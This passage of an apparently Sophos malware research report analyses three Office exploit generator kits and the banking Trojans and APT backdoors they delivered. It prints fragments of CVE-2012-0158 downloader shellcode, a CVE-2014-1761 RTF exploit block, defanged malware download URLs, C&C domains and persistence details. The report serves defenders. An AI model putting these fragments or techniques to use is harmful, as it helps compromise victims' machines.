Office Exploit Generators Page 33 of 50 Office Exploit Generators The kit’s most active period was July-­‐August 2015 and, after a momentary dip, resurrected in December 2015 rolling on ever since. This is illustrated in the following chart. 40 35 30 25 20 15 10 5 0 Jul-­‐15 Aug-­‐15 Sep-­‐15 Oct-­‐15 Nov-­‐15 Dec-­‐15 Jan-­‐16 Feb-­‐16 The file sizes are typically smaller, compared to other kits, ranging between 15KB to 2MB. The documents are Rich Text Format, with the following structure: RTF head and filler Embedded fake objects CVE-­‐2012-­‐0158 block Trailing junk Again, like DL-­‐1 the beginning and the end of the documents are filled with large blocks of innocent content. The documents start with the RTF header which is followed by junk content. This junk content can be either some unused RTF metadata (almost exactly the same as in DL-­‐1): {\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31506\stshfloch31506\stshfhich31506\sts
hfbi31507\deflang1033\deflangfe1033\themelang1033\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi
\froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f34\fbidi
\froman\fcharset1\fprq2{\*\panose 02040503050406030204}Cambria Math;}
{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f38\fbidi
\fswiss\fcharset0\fprq2{\*\panose 020b0604030504040204}Tahoma;}{\flomajor\f31500\fbidi
\froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}
{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New
Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}
Office Exploit Generators Page 34 of 50 Office Exploit Generators In other cases the junk content is a huge block of non-­‐ASCII characters: The embedded object is usually a meaningless picture, like: Or (The latter of these pictures was also seen in DL-­‐1 files, but this could be more of a connection between the deployment of the kits and not necessarily the development) Unlike other kits, the shellcode is not fragmented but some obfuscation is applied: 640000008282000082820000000000004343434360016327FE6E60279090909090909090624A5F27303C582{79090EB1C056d58277
BF55D277dfb5c279090EB0CA22660279090909090909090909090E91A0200004545454545454545454545454545454545454545454
5454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454
5454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454
5454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454
5454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454
5454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454
5454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454
5454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454
5454545454545454545454545454545454545454545454545454545454545454545454545454545
AEBC6127C81158276C0B5E27FE675927F2C95C2
700000000000C00000030000040000000000C000046EA5927A40D592700A0622785005E2710A062271260592779885B27E7CF5D270
0000000240000000000000012605927B8015E2700000000A29259276792582790
Office Exploit Generators Page 35 of 50 Office Exploit Generators 9090909090909033C9648B41308B400C8B7014AD96AD8B58108B533C03D38B527803D38B722003F333C941AD03C381384765745075
F4817804726F634175EB817808646472
The major differentiation from DL-­‐1 is the payload. The shellcode itself is still simple downloader code i.e. calling URLDownloadToFileA to download the payload and WinExex to run it. Also in this kit the imported Windows API function names are stored in clear sight: Following the shellcode is a large block of ‘0’characters, very similar to that of DL-­‐1, once again to appear as an innocent document. Optionally at the end of the file a characteristic block from CVE-­‐2014-­‐
1761 exploit is attached: {\lfolevel\listoverridestartat\listoverrideformat{\listlevel\levelnfc0\levelnfcn194\leveljc0\leveljcn3\lev
elfollow39\levelstartat31611\levelegal1\levelnorestart0\levelpicture1\levelold0\levelprev1\levelprevspace1
\levelspace22873\levelindent23130{\levelnumbers\'5c\'27AAAAAAAA;}}}
{\lfolevel}{\lfolevel}{\lfolevel}{\lfolevel}{\lfolevel}{\lfolevel}{\lfolevel}{\lfolevel}{\lfolevel}{\lfole
vel}{\lfolevel}{\lfolevel}{\lfolevel}{\lfolevel}{\lfolevel}{\lfolevel}{\lfolevel}{\lfolevel}{\lfolevel}{\l
folevel}{\lfolevel}{\lfolevel}{\lfolevel}{\lfolevel}{\lfolevel}{\lfolevel}{\lfolevel}{\lfolevel}{\lfolevel}
It is not clear what the point of the last piece is. Clearly, attaching a suspicious exploit block is not the best way to make an exploited document look clean. Perhaps it is aimed at generating false positive detection on the CVE-­‐2014-­‐1761 block – after which a quick and careless analysis may fail to spot the real danger, the CVE-­‐2012-­‐0158 part. Distributed malware We have identified about 200 malicious documents generated by the kit; the most frequent payload families being: Office Exploit Generators Page 36 of 50 Office Exploit Generators Andromeda 3% NeWiredRC NetWiredRC Skeeyah 3% 3% 3% KeyBase 5% Zbot 38% Fareit 21% Neurevt 24% There is a clear overlap with the DL-­‐1 distribution, Zbot, Neurevt, FareIt and the other big players are all deployed in both kits. Example -­‐ Neurevt SHA1: 25bc29eaf2d762774e0dec7ac11220cba1ba86ac
Original name:
Drawing_spec.doc
FORMIKE PO#4845.doc
First seen: 19/01/2016
This document was distributed in the following phishing e-­‐mail: Pretending to be an invoice, the social engineering focused on inducing panic on the recipient by mentioning previously refused attempts. Office Exploit Generators Page 37 of 50 Office Exploit Generators Another instance tried to impersonate the IRS claiming to be a tax refund: There were a handful of other documents that belonged to the same campaign; the relationship linked to the usage of the same download or C&C server. First seen
Malware
SHA1
Original name
14/01/2016
Zbot
87e0d3a311383aa4e579ec07e3f2bda3dbe05f33
TRVSJK PRICE.doc
15/01/2016
Zbot
2dd6ca8af26888456862334f917112f265da45a2
Jan_2016_Order_Sheet.doc
15/01/2016
Fareit
4181106eebb05a2d78043be3b42e79c8c9c8ae13
Paymentx2520Advice.doc
18/01/2016
Neurevt
0a5f52d4a24a1b489fa59713ce235c4c29e3f8e2
Drawings - Lemar Ind corp.doc
18/01/2016
Fareit
675bee8ce14ddc1478f932a719b59831fcb3e883
Jan_2016_Order_Sheet.doc
18/01/2016
Neurevt
0a5f52d4a24a1b489fa59713ce235c4c29e3f8e2
Drawings - Lemar Ind corp.doc
19/01/2016
Neurevt
45b3a13841a0cd1ab354a49872749a37ec302537
PcxOrder160111-19 for Mr hassan.doc
19/01/2016
Neurevt
25bc29eaf2d762774e0dec7ac11220cba1ba86ac
Drawing_spec.doc,
20/01/2016
Zbot
5396bd0eb4d37836c09ff60fd06ba049c2a2f435
PcxOrder 1100-19 Mr Hassan.doc
20/01/2016
Neurevt
887ddbb3675ab262dc792f637d55dd919eeb1cd3
20/01/2016
Neurevt
914b4279724a2ff0572e7f624747f140fcdb0498
20/01/2016
Neurevt
5dba7386c798d2fc06e5f31d037b95fc5616454c
20/01/2016
Neurevt
887ddbb3675ab262dc792f637d55dd919eeb1cd3
20/01/2016
Neurevt
914b4279724a2ff0572e7f624747f140fcdb0498
Office Exploit Generators FORMIKE PO#4845.doc
Page 38 of 50 Office Exploit Generators 20/01/2016
Neurevt
5dba7386c798d2fc06e5f31d037b95fc5616454c
25/01/2016
Zbot
d0f51362f78568bf1dcedcffca4dea5a9080046e
Pcx-Order 4863-30.doc
25/01/2016
Zbot
e11c176fd46e58b3aa1d95e7ac66660f70708e8c
PO34999SC.doc
26/01/2016
Neurevt
beaf29a0d90fd3c63c57516027bf96c98d070003
PO #125201665.doc
26/01/2016
Neurevt
6f033916f88ae4585fec5ec513d6b7bd17b84b8f
PO #125201665.doc
27/01/2016
c7169ff75443f556302fa42d51372990f7f4b7b8
27/01/2016
Neurevt
47209494b1363d469d29072f3d0467ad746b6bdb
Tax 1040A.doc
08/02/2016
Fareit
5a691317c944bf32f525a53021c92a5ebe89fae0
WG Payment Advice - Advice Ref
G11299728479 Priority payment Customer
Ref INVO5363 .msg
The samples download and execute the following link: hxxp://sjc4911[.]com/.css/em.exe. This server seems to be a compromized site as the site’s landing page is unrelated to the distributed malware: The criminals used this site as a repository. In January 2016 it hosted several malware variants (FareIt, Zbot and Neurevt variants) (data from Virustotal): 4/66
5/66
8/66
4/66
3/66
3/66
6/66
4/66
6/66
4/66
6/66
5/66
4/66
3/66
2/66
5/66
2016-01-27
2016-01-27
2016-01-26
2016-01-26
2016-01-25
2016-01-25
2016-01-21
2016-01-20
2016-01-20
2016-01-20
2016-01-20
2016-01-20
2016-01-19
2016-01-19
2016-01-16
2016-01-15
01:59:56
01:58:50
23:30:53
20:40:34
18:49:05
09:36:48
20:24:10
23:51:28
18:24:15
18:02:46
06:23:43
00:09:50
22:45:47
17:56:42
00:35:32
21:30:35
hxxp://sjc4911[.]com/.css/pong.exe
hxxp://sjc4911[.]com/.css/sm.exe
hxxp://sjc4911[.]com/.css/pr.exe
hxxp://sjc4911[.]com/.css/sb.exe
hxxp://sjc4911[.]com/.sql/jazzman.exe
hxxp://sjc4911[.]com/.css/br.exe
hxxp://sjc4911[.]com/.css/em.exe
hxxp://sjc4911[.]com/.css/dam.exe
hxxp://sjc4911[.]com/.sql/stanru.exe
hxxp://sjc4911[.]com/.sql/okoro.exe
hxxp://sjc4911[.]com/.sql/mike.exe
hxxp://sjc4911[.]com/.sql/ashok.exe
hxxp://sjc4911[.]com/.sql/swanky.exe
hxxp://sjc4911[.]com/.css/dl.exe
hxxp://sjc4911[.]com/.sql/pius.exe
hxxp://sjc4911[.]com/.css/dan.exe
This particular sample downloaded a Neurevt/BetaBot variant, which connects to the C&C server at igeo.work, which hosted a Pony C&C control panel Office Exploit Generators Page 39 of 50 Office Exploit Generators C&C servers related to the campaigns: •
•
•
•
•
•
swanky.xyz tekyalhaja.xyz tekjazzman.work tekekon.xyz idan.work igeo.work The latter was registered by Geo William (igeo.work@yopmail[.]com), earlier the same registration data was used to register techgeo.asia (a DL-­‐1 related domain), used early 2015 in malware distribution campaigns: 4/62
4/62
4/62
4/62
3/62
3/61
2015-03-28
2015-03-28
2015-03-22
2015-03-19
2015-02-03
2015-01-22
02:39:50
02:38:27
01:19:58
04:13:28
12:16:22
13:57:58
hxxp://techgeo.asia/SON.exe
hxxp://techgeo.asia/son.exe
hxxp://techgeo.asia/a6/order.php?id=9104863
hxxp://techgeo.asia/a6/order.php?page=78
hxxp://techgeo.asia/d5/order.php?pid=438
hxxp://techgeo.asia/d2/order.php?page=48
This connection established by the same registrant indicates that the same group was using both DL-­‐1 and DL-­‐2 at different times. In these campaigns, the distributed malware were high profile banking Trojan families, Zbot, FareIt and Neurevt. Zbot is an infamous banking password stealer and botnet, while FareIt is frequently used to distribute another banking Trojan, Dyreza. Finally, Neurevt (Betabot) also has strong banking relations. MNKit Sophos detection: Troj/DocDrop-­‐BN, Exp/20120158-­‐A MNKit is a generator that has been extensively used by several APT groups since early 2013 although its popularity has dwindled in recent months. Despite its popularity, it hasn’t had much coverage vaguely mentioned amongst security researchers. Office Exploit Generators Page 40 of 50 Office Exploit Generators 35 30 25 20 15 10 5 0 Characteristics MNKit only makes use of the CVE-­‐2012-­‐0158 exploit. It generates documents in the rarely used and mostly forgotten MHTML document format, which is one of the file formats introduced with Office 2003. This file format is practically obsolete, replaced by the more efficient DOCX format. It is safe to say that the major users of this format are the cybercriminals – not only the APT groups by the use of MNKit but also the groups responsible for distributing Dridex rediscovered this rare file format. Unlike the previously discussed kits, MNKit doesn’t distribute downloaders -­‐ just droppers -­‐ and has the following schematic format: MIME header and metadata Embedded CVE-­‐2012-­‐0158 object Encrypted decoy Encrypted payload The MHTML file format, even though it is designed for document content, is basically the same as the MIME mail format, it starts with a mail header: MIME-Version: 1.0
Content-Type: multipart/related; boundary="----=_NextPart_01CD27E7.8767FC40"
this document is a Single File Web Page,also known as Web archive file. if you see this message,
your browser or editor does not support, please use Microsoft Internet Explorer¡£
------=_NextPart_01CD27E7.8767FC40
Content-Location: file:///C:/2673C891/Doc1.htm
Content-Transfer-Encoding: quoted-printable
Content-Type: text/html; charset="us-ascii"
This header is followed by the some metadata including document properties: <o:DocumentProperties>
<o:Author>User123</o:Author>
Office Exploit Generators Page 41 of 50 Office Exploit Generators <o:LastAuthor>User123</o:LastAuthor>
<o:Revision>4</o:Revision>
<o:TotalTime>2</o:TotalTime>
<o:Created>2012-05-01T14:08:00Z</o:Created>
<o:LastSaved>2012-05-01T14:12:00Z</o:LastSaved>
<o:Pages>44</o:Pages>
<o:Words>17</o:Words>
<o:Characters>101</o:Characters>
Interestingly, even though it would be trivial to modify, the Author name for the MNKit generated documents is almost always User123. A couple of recent samples use a different user name, User323. The next component is an embedded binary block. It is a stripped down OLE2 block that exploits the CVE-­‐2012-­‐0158 vulnerability. It is stored as a MIME part: ------=_NextPart_01CD27E7.8767FC40
Content-Location: file:///C:/2673C891/Doc1.files/ocxstg001.mso
Content-Transfer-Encoding: base64
Content-Type: application/x-mso
0M8R4KGxGuEAAAAAAAAAAAAAAAAAAAAAPgADAP7/CQAGAAAAAAAAAAAAAAABAAAAAQAAAAAAAAAAEAAAAgAAAAEAAAD+////AAAA
AAAAAAD///////////////////////////////////////////////////////////////////////////
This embedded object contains only one stream: Contents. This triggers the vulnerability and invokes the shellcode. The shellcode enumerates all open files, selects the one that matches the expected file length of the carrier document. Then searches for the MN marker in the file that marks the beginning of the encrypted decoy document. Office Exploit Generators Page 42 of 50 Office Exploit Generators Since the two-­‐letter MN combination is a weak pattern, and that the MHTML is pure text, the documents are created in a way where this combination will not appear in the content preceding the payload. If the marker is found, then the decoy and payload are decrypted, usually a running key one byte XOR algorithm, although some Plugx droppers combine it with additional LZNT decompression. Distributed malware We have identified about 250 documents generated by MNKit, which were used to distribute about 40 common APT malware families. The most frequent families of them are illustrated in this chart: Zegost 2% Other 20% Travnet 2% Xylow 2% Neysd 2% Blame 2% Barkio 2% Saker 3% Poison Ivy 6% Gegnah 3% Plugx 8% Meciv 6% Farfli 7% Smoaler 8% Omdork 8% Xinmic 8% Webmonder 8% Fakem 3% Many of them could be familiar to the readers as we have covered in the past in detail Plugx, Smoaler, Blame. Example – Travnet The most recent use of the kit was distributing a Trojan related to the infamous NetTraveler APT operation. Our example is very similar to the one reported by Palo Alto researchers. SHA1: c64ac1fed412c4abaf7b65342441db01a53d497e
Office Exploit Generators Page 43 of 50 Office Exploit Generators Original name: ПЛАН РЕАЛИЗАЦИИ ПРОЕКТА.doc
First seen: 21/01/2016
The sample was most likely delivered in a targeted email campaign with an exploited MHTML document attached. It was reported from Russia. On opening the attachment, the exploit is triggered and a decoy document is created in %TEMP%\~$.doc, and displayed. Interestingly, this decoy is a blank document: After the decoy is set up, the shellcode proceeds to decrypt the payload executable and executes it. This process is very similar to the one we have previously seen with Plugx backdoor droppers. The shellcode drops a first stage installer, which will be removed from the system after the installation is complete. This installer is a self-­‐extracting RAR archive, which contains three files: •
•
•
RasTls.exe: clean loader Rastls.dll: malware loader Sycmentec.config: payload The archive is configured in a way that RasTls.exe will automatically execute when the archive is unpacked. It uses the same DLL side-­‐loading trick of many Plugx variants: one of the dependencies of the executable (rastls.dll) is replaced by a malicious component. Thus, when RasTls.exe is executed, it will automatically load rastls.dll, and then the installation of the backdoor will take place. The backdoor components will be dropped to the following locations: Office Exploit Generators Page 44 of 50 Office Exploit Generators •
•
•
%PROFILE%\Application Data\RasTls.exe (clean loader) %PROFILE%\Application Data\RasTls.dll (loader) %PROFILE%\Application Data\Sycmentec.config (payload) A startup link is created and started in %STARTMENU%\Programs\Startup\RasTls.lnk, this will make sure that the backdoor is loaded during every system startup. An additional copy of the malicious loader is created in %SYSTEM%\Ipripve.dll, which is registered as a service in the registry in HKLM\SYSTEM\CurrentControlSet\Services\Iprip\Parameters\ServiceDll RastTls.exe is an innocent application by Symantec: When this executable loads rastls.dll, it will search for the payload file (Sycmentec.config) in the current directory, load its content, decrypt it (the algorithm is a one-­‐byte XOR, the key is 0x6b), and then execute it. Office Exploit Generators Page 45 of 50 Office Exploit Generators The decrypted configuration file starts with a simple loader code, and that is followed by the final backdoor code: The loader code does nothing else but allocates a memory region, copies the backdoor there, replicates the actions of the Windows loader, and executes it. This way the final backdoor component never hits the disk, and only ever exists in memory. Office Exploit Generators Page 46 of 50 Office Exploit Generators When the backdoor is loaded, it reads the content of the file Cert2015.dat, which contains the encrypted configuration data, including the C&C server name, which in the case of this sample is www.info-­‐spb[.]com. When connecting to the C&C server, it uploads the collected system information: After the connection is established, the backdoor waits for the remote commands. However, it supports only a minimal set of commands: Command Action :RUN_STARTUP Downloads URL to %TEMP%\temp.bmp and copies to the startup directory :UNINSTALL Attempts to uninstall the Trojan (but the filenames are not synced with this version) :RUN_REBOOT Downloads URL to %TEMP%\temp.bmp and executes and then reboots the computer :RUN_DIRECT Downloads URL to %TEMP%\temp.bmp and executes Tran Duy Linh Sophos detection: Troj/DocDrop-­‐BE, Troj/20120158-­‐S, The Tran Duy Linh (TDL) kit is a generator extensively used by several APT groups since 2013, but we have only seen a handful of new samples. The huge peak in June 2013 is the effect of the Tomato Garden campaign. Office Exploit Generators Page 47 of 50 Office Exploit Generators 60 50 40 30 20 10 0 This kit is frequently reported by security researchers, and was used by high profile APT groups and operations such as APT 12, Icefog, Spring Dragon, Hacking Team or CMStar, to name a few. Characteristics TDLKit exclusively uses the CVE-­‐2012-­‐0158 exploit. It generates documents in the OLE2 document format, which is the traditional proprietary Microsoft Office document format. The generated documents are all droppers that exploit only one vulnerability, usually CVE-­‐2012-­‐0158. In 2013 another closely related exploit was used in the Tomato Garden campaign – but this exploit has no CVE number of its own. The generated documents are Word documents. However, these documents don’t have any traditional document content, there is no text or picture in them, only an embedded Toolbar object. This embedded object exploits the CVE-­‐2012-­‐0158 vulnerability and activates the embedded shellcode. Even though the documents don’t contain text, other metadata is stored there, in the document properties. The common characteristics of the TDL Kit generated documents is that the Author of the documents is “Tran Duy Linh”, or in some documents “Tran Duy Lin”. Office Exploit Generators Page 48 of 50 Office Exploit Generators After the exploit triggers, the shellcode executes. To find the carrier document (and the payload) it uses the same handle enumeration technique than MNKit by the use of two 4 byte markers. In the older samples the first marker was the string ‘poiu’, later it changed. Once the markers are found, the payload and the decoy document are decrypted, the payload is executed while the decoy is displayed to cover the activities. The encryption algorithm varies widely, likely based on the preferences of the group using it. The most common algorithm is a one byte XOR with incremented key and a partial swap of bytes in the first few hundred bytes. But the Plugx distributing groups used their usual one byte running XOR algorithm Office Exploit Generators Page 49 of 50 Office Exploit Generators combined with LZNT compression, while other groups used the same one byte running key XOR with the zero bytes left intact as we saw with MWI. Distributed malware We have identified about 330 documents generated by the TDL kit, which were used to distribute about 40 common APT malware families. The most frequent families of them are illustrated in this chart: Rerol 2% Darkmoon 10% Other 26% Meciv 9% Esile 9% Poison 2% Mirsonk 2% Blame 2% Thetabc Plugx 3% 3% Pbger Netero 4% 3% Simbot 4% Rarstone 6% Sacto Insup 6% Tavex 4% 4% There is a significant difference in the malware families distributed by the Tran Duy Linh kit and MNKit, which indicates that these two kits are mostly used by separate APT groups. Conclusion The cybercrime groups find Office documents a convenient way to deliver malicious programs to their targets. They have been using this method steadily over the past two years, and there is no sign that they intend to give up. But their approach is evolving over the time: they use several black market or internal tools to generate the exploited documents, and thanks to the development of these tools they get to use newer Office exploits. However, they don’t get to use zero days. Even the freshest exploit in their arsenal was fixed six months ago. It shouldn’t be difficult to protect against these kinds of activities: just applying the patches for Microsoft Office could disarm the attack. Office Exploit Generators Page 50 of 50